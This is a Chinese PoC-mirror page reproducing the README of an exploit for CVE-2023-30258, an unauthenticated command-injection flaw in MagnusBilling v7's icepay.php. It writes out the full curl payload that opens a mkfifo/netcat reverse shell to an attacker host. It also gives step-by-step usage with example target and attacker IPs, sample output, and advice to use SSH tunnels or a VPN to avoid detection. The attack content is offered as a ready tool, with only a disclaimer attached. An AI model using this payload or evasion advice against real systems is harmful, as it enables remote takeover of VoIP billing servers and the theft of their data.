POC详情: 6b7ffe54b5ec159aa9e83871ea8950dc3794aa49

来源
https://github.com/tinashelorenzi/CVE-2023-30258-magnus-billing-v7-exploit
关联漏洞
标题: MagnusBilling 操作系统命令注入漏洞 (CVE-2023-30258)
描述:MagnusBilling是MagnusSolution开源的一种快速、安全、高效、高可用性的 VOIP 计费。 MagnusSolution MagnusBilling 6.x 、 7.x版本存在操作系统命令注入漏洞,该漏洞源于允许远程攻击者通过未经身份验证的 HTTP 请求运行任意命令。
介绍
# Magnus Billing System v7 Exploit

This Python script automates the exploitation of a command injection vulnerability in Magnus Billing System v7, specifically in the `icepay.php` script located at `/mbilling/lib/icepay/icepay.php`. The exploit leverages the `democ` parameter to execute arbitrary commands on the target system, ultimately establishing a reverse shell to an attacker-controlled machine.

## Vulnerability Overview

The vulnerability allows unauthenticated command injection via a crafted GET request. The original proof-of-concept (PoC) used the following `curl` command:

```bash
curl -s 'http://<TARGET_IP>/mbilling/lib/icepay/icepay.php' --get --data-urlencode 'democ=;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <ATTACKER_IP> <PORT> >/tmp/f;'
```

This script automates that process, making it configurable via command-line arguments.

## Features

- **Configurable**: Specify the target IP, attacker IP, and port via command-line arguments
- **Simple**: Uses the `requests` library to send the HTTP request with the payload
- **Feedback**: Provides clear output to track the exploit's progress

## Prerequisites

- **Python 3.x**: Ensure Python 3 is installed on your system
- **Requests Library**: Install the `requests` Python module:
  ```bash
  pip install requests
  ```
- **Netcat**: The target system must have `netcat` (`nc`) installed for the reverse shell to work
- **Listener**: Set up a `netcat` listener on the attacker machine to catch the reverse shell
- **Vulnerable Target**: The target must be running Magnus Billing System v7 with the vulnerable `icepay.php` script accessible

## Usage

### Setup

1. **Clone or Download**: Save the script as `exploit.py`
2. **Set Up Listener**: On your attacker machine, start a `netcat` listener:
   ```bash
   nc -lvnp <PORT>
   ```
   Replace `<PORT>` with your chosen port (e.g., `443`)

### Running the Exploit

```bash
python exploit.py -t <TARGET_IP> -a <ATTACKER_IP> -p <PORT>
```

**Parameters:**
- `-t, --target`: IP address of the target Magnus Billing System
- `-a, --attacker`: Your IP address to receive the reverse shell
- `-p, --port`: Port on your machine for the reverse shell

### Example

```bash
python exploit.py -t 10.10.160.86 -a 10.8.64.79 -p 443
```

**Expected Output:**
```
=== Magnus Billing System v7 Exploit ===
Command Injection via icepay.php - Reverse Shell
=======================================
[+] Targeting: http://10.10.160.86/mbilling/lib/icepay/icepay.php
[+] Attacker: 10.8.64.79:443
[+] Sending payload: ;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.8.64.79 443 >/tmp/f;
[+] Request sent successfully!
[*] Check your netcat listener (e.g., 'nc -lvnp 443') for a shell.
```

4. **Catch the Shell**: Switch to your `netcat` listener to interact with the reverse shell if successful

## Technical Notes

- **Payload Type**: The script uses a FIFO-based reverse shell (`mkfifo`) with `netcat`
- **Error Handling**: Basic checks for network errors and invalid ports are included
- **Debugging**: To inspect the server's response, uncomment `print(response.text)` in the `exploit()` function
- **Alternative Payloads**: The script can be modified to use different reverse shell payloads if needed

## Troubleshooting

- If the connection fails, verify that:
  - The target system has `netcat` installed
  - No firewall is blocking the connection
  - The correct ports are being used
  - The target has not been patched

## Security Considerations

- Consider using SSH tunneling or a VPN when using this exploit to avoid detection
- The payload might trigger security monitoring systems

## Disclaimer

This tool is provided for **educational and security testing purposes only**. Use it only on systems you have explicit permission to test. Unauthorized use against systems you do not own or have consent to test is illegal and unethical. The author is not responsible for any misuse or damage caused by this script.

## License

This project is released under the MIT License. Feel free to modify and distribute it as needed, keeping the disclaimer intact.

## Contributing

Contributions, bug reports, and feature requests are welcome. Please feel free to submit a pull request or open an issue.
文件快照

 [4.0K]  /data/pocs/6b7ffe54b5ec159aa9e83871ea8950dc3794aa49
├── [2.7K]  exploit.py
└── [4.1K]  README.md

0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。